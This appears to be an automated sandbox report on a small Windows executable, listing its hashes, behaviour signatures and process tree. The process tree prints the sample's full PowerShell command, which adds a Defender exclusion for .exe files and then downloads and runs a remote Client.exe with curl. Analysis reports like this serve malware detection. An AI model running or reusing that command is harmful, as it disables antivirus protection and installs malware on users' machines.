Analysis
-
max time kernel
120s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
15/01/2024, 04:40
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
5c288f37deb02580409947362248be72.exe
Resource
win7-20231215-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
5c288f37deb02580409947362248be72.exe
Resource
win10v2004-20231215-en
5 signatures
150 seconds
General
-
Target
5c288f37deb02580409947362248be72.exe
-
Size
8KB
-
MD5
5c288f37deb02580409947362248be72
-
SHA1
06a3499ac18464732a316e2b5603287976ee6cb2
-
SHA256
8a1e30ba936fd74b90a7174d04ad0f2ae6f60bbefa20f3f01888512e38ccdf01
-
SHA512
534360048d156361561da9a099d8e4cb10ec809933e89d9c47d836dd26310c56ce6607303f07842a12396fab3d21546574b4f7cde4b762edc0c75db25d80dc65
-
SSDEEP
192:aLa4qbXNSrSi4VYnlYJLLLTxZwz9sYQbeE9X1:aLrqa4PPLTxZwz9/U
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2768 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2352 wrote to memory of 2768 2352 5c288f37deb02580409947362248be72.exe 28 PID 2352 wrote to memory of 2768 2352 5c288f37deb02580409947362248be72.exe 28 PID 2352 wrote to memory of 2768 2352 5c288f37deb02580409947362248be72.exe 28 PID 2352 wrote to memory of 2768 2352 5c288f37deb02580409947362248be72.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\5c288f37deb02580409947362248be72.exe"C:\Users\Admin\AppData\Local\Temp\5c288f37deb02580409947362248be72.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe;Start-Sleep -s 15;curl.exe -o C:\Users\Public\x.exe --url https://transfer.sh/get/1mkaArV/Client.exe;C:\Users\Public\x.exe;exit2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-